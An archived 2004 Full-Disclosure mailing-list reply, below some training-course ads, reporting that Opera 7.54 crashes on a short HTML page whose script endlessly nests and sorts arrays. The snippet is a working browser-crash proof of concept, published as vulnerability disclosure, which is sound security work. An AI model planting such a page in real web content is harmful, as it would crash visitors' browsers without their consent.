Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-Disclosure] Re: Opera flaws: nested array sort() loop Stack overflow exception |
|---|---|
| Date: | Fri, 26 Nov 2004 00:13:51 +0100 (CET) |
Opera Browser (v7.54 for Windows) crashes as well with mentioned code:
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
</HTML>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | RE: [Full-Disclosure] Mailing lists and unsolicited/malicious spam, David Taylor |
|---|---|
| Next by Date: | Re: [Full-Disclosure] Why is IRC still around?, n3td3v |
| Previous by Thread: | Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception, Juan Carlos Navea |
| Next by Thread: | [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception, Berend-Jan Wever |
| Indexes: | [Date] [Thread] [Top] [All Lists] |